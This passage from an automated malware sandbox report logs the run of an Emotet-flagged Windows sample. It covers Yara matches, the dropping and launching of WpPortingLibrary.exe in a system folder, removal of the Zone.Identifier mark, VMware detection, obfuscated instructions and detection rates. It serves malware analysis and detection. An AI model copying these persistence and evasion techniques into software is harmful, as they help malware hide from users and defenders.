Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000002.304715723.00000189FAC3A000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000000.00000002.238986600.0000000002EB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500653398.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.239016780.0000000002EF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500762111.0000000002A34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238943742.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500809704.0000000002A71000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.FsWcL0gpTv.exe.2ef0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.WpPortingLibrary.exe.2a70000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 3_2_02A72650
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 3_2_02A72650

System Summary:

barindex
Creates files inside the system directory
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File created: C:\Windows\SysWOW64\offreg\ Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File created: C:\Windows\SysWOW64\offreg\ Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File deleted: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.Identifier Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File deleted: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.Identifier Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF8240 0_2_02EF8240
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3BA0 0_2_02EF3BA0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF1C70 0_2_02EF1C70
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF7740 0_2_02EF7740
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3F20 0_2_02EF3F20
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF6530 0_2_02EF6530
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3D10 0_2_02EF3D10
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E792DE 0_2_02E792DE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E75ABE 0_2_02E75ABE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7573E 0_2_02E7573E
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E780CE 0_2_02E780CE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E758AE 0_2_02E758AE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E87069 0_2_02E87069
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7380E 0_2_02E7380E
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E79DDE 0_2_02E79DDE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF8240 0_2_02EF8240
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3BA0 0_2_02EF3BA0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF1C70 0_2_02EF1C70
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF7740 0_2_02EF7740
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3F20 0_2_02EF3F20
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF6530 0_2_02EF6530
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3D10 0_2_02EF3D10
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E792DE 0_2_02E792DE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E75ABE 0_2_02E75ABE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7573E 0_2_02E7573E
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E780CE 0_2_02E780CE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E758AE 0_2_02E758AE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E87069 0_2_02E87069
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7380E 0_2_02E7380E
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E79DDE 0_2_02E79DDE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A78240 3_2_02A78240
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A73BA0 3_2_02A73BA0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A73F20 3_2_02A73F20
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A76530 3_2_02A76530
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A73D10 3_2_02A73D10
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A71C70 3_2_02A71C70
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A77740 3_2_02A77740
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F5ABE 3_2_029F5ABE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F92DE 3_2_029F92DE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F573E 3_2_029F573E
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F58AE 3_2_029F58AE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F80CE 3_2_029F80CE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F380E 3_2_029F380E
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A07069 3_2_02A07069
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F9DDE 3_2_029F9DDE
Sample file is different than original file name gathered from version info
Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmp Binary or memory string: originalfilename vs FsWcL0gpTv.exe
Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs FsWcL0gpTv.exe
Source: FsWcL0gpTv.exe, 00000000.00000002.239187518.0000000003310000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs FsWcL0gpTv.exe
Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmp Binary or memory string: originalfilename vs FsWcL0gpTv.exe
Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs FsWcL0gpTv.exe
Source: FsWcL0gpTv.exe, 00000000.00000002.239187518.0000000003310000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs FsWcL0gpTv.exe
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Source: classification engine Classification label: mal80.troj.evad.winEXE@16/5@0/5
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle, 0_2_02EF87D0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle, 0_2_02EF87D0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A74CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification, 3_2_02A74CB0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A74CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification, 3_2_02A74CB0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02EF5070
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02EF5070
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5284:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5284:120:WilError_01
Source: FsWcL0gpTv.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: FsWcL0gpTv.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: FsWcL0gpTv.exe Virustotal: Detection: 61%
Source: FsWcL0gpTv.exe Metadefender: Detection: 45%
Source: FsWcL0gpTv.exe ReversingLabs: Detection: 70%
Source: FsWcL0gpTv.exe Virustotal: Detection: 61%
Source: FsWcL0gpTv.exe Metadefender: Detection: 45%
Source: FsWcL0gpTv.exe ReversingLabs: Detection: 70%
Source: unknown Process created: C:\Users\user\Desktop\FsWcL0gpTv.exe 'C:\Users\user\Desktop\FsWcL0gpTv.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown Process created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Process created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\FsWcL0gpTv.exe 'C:\Users\user\Desktop\FsWcL0gpTv.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown Process created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Process created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EB1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02EB1030
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EB1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02EB1030
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5DF0 push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02EF5DF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5EF0 push ecx; mov dword ptr [esp], 0000669Ch 0_2_02EF5EF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5DC0 push ecx; mov dword ptr [esp], 000089FAh 0_2_02EF5DC1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5CD0 push ecx; mov dword ptr [esp], 00001CE1h 0_2_02EF5CD1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5EA0 push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02EF5EA1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D90 push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02EF5D91
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D50 push ecx; mov dword ptr [esp], 00006847h 0_2_02EF5D51
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D20 push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02EF5D21
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5F20 push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02EF5F21
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D00 push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02EF5D01
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5E10 push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02EF5E11
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E77ABE push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02E77ABF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E77A8E push ecx; mov dword ptr [esp], 0000669Ch 0_2_02E77A8F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E93E9C push ebx; iretd 0_2_02E93EAF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E93E9C push FFFFFF95h; iretd 0_2_02E93EF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E77A3E push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02E77A3F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E778EE push ecx; mov dword ptr [esp], 00006847h 0_2_02E778EF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E778BE push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02E778BF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7789E push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02E7789F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7786E push ecx; mov dword ptr [esp], 00001CE1h 0_2_02E7786F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E939D9 push ss; iretd 0_2_02E939DE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E779AE push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02E779AF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E8858F push edi; iretd 0_2_02E885A1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7798E push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02E7798F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7795E push ecx; mov dword ptr [esp], 000089FAh 0_2_02E7795F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7792E push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02E7792F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5DF0 push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02EF5DF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5EF0 push ecx; mov dword ptr [esp], 0000669Ch 0_2_02EF5EF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5DC0 push ecx; mov dword ptr [esp], 000089FAh 0_2_02EF5DC1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5CD0 push ecx; mov dword ptr [esp], 00001CE1h 0_2_02EF5CD1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5EA0 push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02EF5EA1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D90 push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02EF5D91
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D50 push ecx; mov dword ptr [esp], 00006847h 0_2_02EF5D51
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D20 push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02EF5D21
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5F20 push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02EF5F21
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D00 push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02EF5D01
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5E10 push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02EF5E11
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E77ABE push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02E77ABF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E77A8E push ecx; mov dword ptr [esp], 0000669Ch 0_2_02E77A8F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E93E9C push ebx; iretd 0_2_02E93EAF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E93E9C push FFFFFF95h; iretd 0_2_02E93EF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E77A3E push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02E77A3F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E778EE push ecx; mov dword ptr [esp], 00006847h 0_2_02E778EF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E778BE push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02E778BF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7789E push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02E7789F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7786E push ecx; mov dword ptr [esp], 00001CE1h 0_2_02E7786F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E939D9 push ss; iretd 0_2_02E939DE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E779AE push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02E779AF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E8858F push edi; iretd 0_2_02E885A1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7798E push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02E7798F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7795E push ecx; mov dword ptr [esp], 000089FAh 0_2_02E7795F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7792E push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02E7792F
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75EA0 push ecx; mov dword ptr [esp], 0000A3FDh 3_2_02A75EA1
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75D90 push ecx; mov dword ptr [esp], 0000B2E0h 3_2_02A75D91
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75DF0 push ecx; mov dword ptr [esp], 0000AAF5h 3_2_02A75DF1
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75EF0 push ecx; mov dword ptr [esp], 0000669Ch 3_2_02A75EF1
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75DC0 push ecx; mov dword ptr [esp], 000089FAh 3_2_02A75DC1

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Executable created and started: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Executable created and started: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Jump to behavior
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe PE file moved: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe PE file moved: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File opened: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File opened: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.Identifier read attributes | delete Jump to behavior

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality to enumerate running services
